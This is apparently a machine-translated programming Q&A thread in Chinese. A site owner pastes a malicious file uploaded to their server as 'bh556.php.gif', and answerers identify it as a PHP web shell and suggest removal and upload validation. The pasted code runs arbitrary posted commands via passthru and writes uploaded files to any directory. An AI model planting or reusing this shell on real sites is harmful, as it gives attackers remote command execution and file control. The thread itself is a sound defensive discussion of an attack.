Php 可能的网站黑客企图

Php 可能的网站黑客企图,php,validation,Php,Validation,我刚从主人那里收到一条温馨的信息告诉我。。 “我们检测到恶意试图通过http或ftp访问您的帐户” 检查恶意文件后,有人上传了一个名为“bh556.php.gif”的图标 打开此文件时,它包含以下代码: <html> <head> <div align="left"><font size="1">Input command :</font></div> <form name="cmd" method="POST" en

我刚从主人那里收到一条温馨的信息告诉我。。 “我们检测到恶意试图通过http或ftp访问您的帐户”

检查恶意文件后,有人上传了一个名为“bh556.php.gif”的图标

打开此文件时,它包含以下代码:

<html>
<head>
<div align="left"><font size="1">Input command :</font></div>
<form name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input"><br>
<pre>
<?php
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
}
?>
</pre>
<hr>
<div align="left"><font size="1">Uploader file :</font></div>

<?php
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
   $pwddir = $_POST['dir'];
   $real = $_FILES['file']['name'];
   $dez = $pwddir."/".$real;
   copy($uploaded, $dez);
   echo "FILE UPLOADED TO $dez";
}
?>     </pre>
<form name="form1" method="post" enctype="multipart/form-data">
 <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
 <input type="submit" name="submit2" value="Upload">
 <input type="file" name="file" size="15">
      </td>
    </tr>
</table>
</body>
</html>

输入命令:


上载程序文件: 这是一个PHP Webshell,请参阅以获取常见的Webshell列表。它允许恶意用户通过PHP文件执行命令,这是非常危险的

通过标题和一些巧妙的技巧将它们隐藏在图像中是常见的,请参见说明


我的建议是,删除该文件,找出泄漏的原因,这可能是某种类型的注入攻击。

“代码在做什么?”
尝试创建一个后门,用于上载其他文件并在服务器上运行任意php代码<代码>“如何防止这种情况”
验证上传脚本中的图像,检查它们是否真的是图像:我敢打赌他使用网站的文件上传功能上传了一个伪装成.gif的shell,希望上传脚本删除.gif扩展名并使其成为.php。然后他就可以通过他的文件控制网站了。但是,我不认为这个shell可以工作,我在shell代码中发现了一些编程错误。例如,标记未关闭。